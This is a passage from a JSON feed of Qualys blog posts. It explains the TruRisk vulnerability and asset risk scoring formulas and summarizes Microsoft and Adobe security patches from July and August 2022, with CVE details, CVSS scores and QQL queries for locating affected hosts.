\n70-79| CVSS High, weaponized exploit available, but no evidence of exploitation \n60-69| CVSS critical, no exploits available \n50-60| CVSS High, a Proof of Concept (PoC) exploit is available \n40-50| CVSS High, no exploit available \n30-39| CVSS Medium, a PoC exploit is available \n1-30| CVSS Low vulnerabilities, low risk of exploitation \n \n### **Asset Risk Score (ARS)**\n\nQualys TruRisk\u2019s next type of risk score allows organizations to identify the riskiest assets in their organization. To assess the risk an asset poses to an organization, the **Asset Risk Score** considers multiple factors.\n\nThe primary factor considered by ARS is Asset Criticality, i.e., what risk the asset poses based on its business value. For example: Is the asset part of a production system, a system hosting a production database, or is it purely an internal system used for development and test purposes? Production assets should be rated higher than test systems.\n\nQualys TruRisk determines the business criticality of the asset using multiple approaches, including: \n\n * **Manual Ratings** \u2013 TruRisk allows users to set the criticality of the system by using asset tags \n * **Synchronization with CMDB** \u2013 Most enterprises store business criticality information for assets in a configuration management database. 
Qualys automatically maps to CMDB data to determine the criticality of the system \n * **APIs** \u2013 Using [Qualys APIs for Asset Management and Tagging](<https://www.qualys.com/docs/qualys-asset-management-tagging-api-v2-user-guide.pdf>), users can assign business criticality to an asset \n\nFinally, TruRisk analyzes the vulnerabilities found on the system and determines the asset\u2019s risk from the QDS scores of those vulnerabilities using a clearly defined formula called the Asset Risk Score formula.\n\n### **Asset Risk Score Formula**\n\nThe Asset Risk Score (ARS) is calculated using the following formula: \n \n \n ARS Score = ACS Score * [wc * Avg (QDS for Critical Vuln) * f (Critical vuln count) + \n \n wh * Avg (QDS for High Vuln) * f (High vuln count) + \n \n wh * Avg (QDS for Medium Vuln) * f (Medium vuln count) + \n \n wh * Avg (QDS for Low Vuln) * f (Low vuln count)] * I(External) \n\nIn the above formula, **_ACS_** is the Asset Criticality Score, **_w_** are the weights fine-tuned by the TruRisk algorithm to multiply each severity level, **_f()_** is a non-linear function that increases exponentially as the number of vulnerabilities increases, and the factor **_I(External)_** is for the case where an asset is external-facing or discoverable by Shodan. 
This factor increases the score appropriately for external-facing assets.\n\nARS Range| Severity| Description \n---|---|--- \n850-1000| Critical| Critical asset with multiple critical or high vulnerabilities \n700-849| High| High-value asset with multiple critical or high vulnerabilities, or one that is exposed to the internet \n500-699| Medium| Moderate-value asset with critical or high vulnerabilities \n0-499| Low| Low-value asset with multiple vulnerabilities \n \n### Conclusion\n\nQualys TruRisk offers organizations a comprehensive approach to risk prioritization by considering multiple factors such as vulnerability exploitation, presence of compensating controls, asset criticality, and asset location (internal or external), to name a few, to paint an accurate picture of an organization\u2019s TruRisk (pun intended). In this blog we did a deep-dive into one aspect of TruRisk (vulnerability prioritization) and showcased how it\u2019s better than existing models. This blog is the first of a series of blogs around TruRisk; in subsequent blogs we will do similar deep-dives into other aspects of TruRisk, e.g., asset risk, asset group risk, misconfigurations, and many more, to help organizations prioritize better based on risk.\n\nWith Qualys TruRisk we have introduced foundational building blocks for major cyber risk initiatives like peer benchmarking, risk score customization, third-party risk assessment, and many more. We are very excited about TruRisk and the benefits it provides to our customers. Stay tuned for more updates.\n\n### Additional Contributors\n\n 1. Shreya Salvi, Data Scientist, Qualys\n 2. Mehul Revankar, VP, Product Management & Engineering for VMDR, Qualys\n 3. 
Payal Mehrotra, Senior Director, Product Management for CyberRisk, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-10T14:32:29", "type": "qualysblog", "title": "In-Depth Look Into Data-Driven Science Behind Qualys TruRisk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3351", "CVE-2021-31207", "CVE-2021-34523", "CVE-2021-36942", "CVE-2022-30190"], "modified": "2022-10-10T14:32:29", "id": "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-15T23:58:32", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). 
Earlier this month, on July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability.\n\n## The July 2022 Microsoft vulnerabilities are classified as follows: \n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nElevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. 
(Article [5015874](<https://support.microsoft.com/help/5015874>))\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n# **Microsoft Critical Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 63 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\nWindows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. 
If you do not have either of these versions of RDP installed on Windows 7 SP1 or Windows Server 2008 R2 SP1, then you are not affected by this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to 
trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Microsoft Last But Not Least**\n\nEarlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp\n\nThis update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). 
Successful exploitation could lead to arbitrary code execution in the context of the current user. \n\n* * *\n\n### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves 22 vulnerabilities: 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_** and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. 
Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop\n\nThis update resolves two (2) vulnerabilities: one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_** and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n# Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your hosts impacted by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n* * *\n\n# Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select the respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. 
\n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T20:09:23", "type": "qualysblog", "title": "July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"], "modified": "2022-07-12T20:09:23", "id": "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T00:03:27", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 121 vulnerabilities (aka flaws) in the August 2022 update, including 17 vulnerabilities classified as 
**_Critical_** as they allow Elevation of Privilege (EoP) and Remote Code Execution (RCE). This month's Patch Tuesday fixes two (2) zero-day vulnerabilities, [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) and [CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>), of which one (1), CVE-2022-34713, is actively exploited in attacks. Earlier this month, August 5, 2022, Microsoft also released 20 Microsoft Edge (Chromium-Based) updates addressing Elevation of Privilege (EoP), Remote Code Execution (RCE), and Security Feature Bypass with severities of Low, Moderate, and Important respectively.\n\nThe flaws Microsoft fixed fall into the following categories: Denial of Service (DoS), Elevation of Privilege (EoP), Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Spoofing.\n\n## **The August 2022 Microsoft vulnerabilities are classified as follows:**\n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n\n# **Notable Microsoft Vulnerabilities Patched**\n\nA vulnerability is classified as a zero-day if it is publicly disclosed or actively exploited with no official fix available.\n\n### [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nIn May, Microsoft released a [blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) giving guidance for a vulnerability in MSDT and released updates to address it shortly thereafter. 
Public discussion of a vulnerability can encourage further scrutiny of the component, by both Microsoft security personnel and their research partners. _This CVE is a variant of the vulnerability publicly known as Dogwalk._\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n>  Qualys director of vulnerability and threat research, [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), said DogWalk had actually been reported back in 2019 but at the time was not thought to be dangerous as it required \u201csignificant user interaction to exploit,\u201d and there were other mitigations in place.\n> \n> - _Excerpt from [Surge in CVEs as Microsoft Fixes Exploited Zero Day Bug](<https://www.infosecurity-magazine.com/news/surge-cves-microsoft-fixes/>)_\n\n* * *\n\n### [CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>) | Microsoft Exchange Information Disclosure Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.6/10.\n\nThis vulnerability requires that a user with an affected version of Exchange Server access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. 
For more information, see [Exchange Server Support for Windows Extended Protection](<https://microsoft.github.io/CSS-Exchange/Security/Extended-Protection/>) (also linked from <https://aka.ms/ExchangeEPDoc>) and/or [The Exchange Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Unlikely_**\n\n* * *\n\n## **Security Feature Bypass Vulnerabilities Addressed**\n\nThese are **standalone security updates**. These packages must be installed in addition to the normal security updates to be protected from these vulnerabilities.\n\nThese security updates have a Servicing Stack Update prerequisite for specific KB numbers. The packages have built-in prerequisite logic to enforce the correct installation order.\n\nMicrosoft customers should ensure they have installed the latest Servicing Stack Update before installing these standalone security updates. 
See [ADV990001 | Latest Servicing Stack Updates](<https://msrc.microsoft.com/update-guide/security-guidance/advisory/ADV990001>) for more information.\n\nAn attacker who successfully exploited any of these three (3) vulnerabilities could bypass Secure Boot.\n\n### CERT/CC: [CVE-2022-34301](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34301>) Eurosoft Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34302](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34302>) New Horizon Data Systems Inc Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34303](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34303>) Crypto Pro Boot Loader Bypass\n\nAt the time of publication, a CVSSv3.1 score has not been assigned.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Critical and Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) covers multiple Microsoft product families, including Azure, Browser, Developer Tools, [Extended Security Updates (ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Exchange Server, Microsoft Office, System Center, and Windows.\n\nA total of 86 unique Microsoft products/versions are affected, including .NET, Azure, Edge (Chromium-based), Excel, Exchange Server (Cumulative Update), Microsoft 365 Apps for Enterprise, Office, Open Management Infrastructure, Outlook, System Center Operations Manager (SCOM), Visual Studio, Windows Desktop, and Windows Server.\n\nDownloads include IE Cumulative, Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-35766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35766>), 
[CVE-2022-35794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35794>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nAn unauthenticated attacker could send a specially crafted connection request to a Remote Access Service (RAS) server, which could lead to remote code execution (RCE) on the RAS server machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>), [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability can only be exploited by communicating via Port 1723. As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port, thus rendering the vulnerability unexploitable. **Warning**: Disabling Port 1723 could affect communications over your network.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) | Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\n
An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.\n\nPlease see [Certificate-based authentication changes on Windows domain controllers](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16>) for more information and ways to protect your domain.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-33646](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33646>) | Azure Batch Node Agent Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.0/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to prepare the target environment to improve exploit reliability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in August, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>), and [CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. 
It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### [CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.6/10.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email. \n\nThe user would have to click on a specially crafted URL to be compromised by the attacker.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>) | Microsoft Edge (Chromium-based) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.3/10. _[Per Microsoft's severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. 
The CVSS scoring system doesn't allow for this type of nuance._\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released five (5) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 25 vulnerabilities affecting Adobe Acrobat and Reader, Commerce, FrameMaker, Illustrator, and Premiere Elements applications. Of these 25 vulnerabilities, 15 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, ranging in severity from a CVSS score of 7.8/10 to 9.1/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-38](<https://helpx.adobe.com/security/products/magento/apsb22-38.html>) | Security update available for Adobe Commerce\n\nThis update resolves seven (7) vulnerabilities:\n\n * Four (4) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n * One (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. 
This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>), [important](<https://helpx.adobe.com/security/severity-ratings.html>), and [moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution, privilege escalation, and security feature bypass.\n\n* * *\n\n### [APSB22-39](<https://helpx.adobe.com/security/products/acrobat/apsb22-39.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves seven (7) vulnerabilities:\n\n * Three (3) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Four (4) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-41](<https://helpx.adobe.com/security/products/illustrator/apsb22-41.html>) | Security Updates Available for Adobe Illustrator\n\nThis update resolves four (4) vulnerabilities:\n\n * Two (2) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Illustrator 2022. 
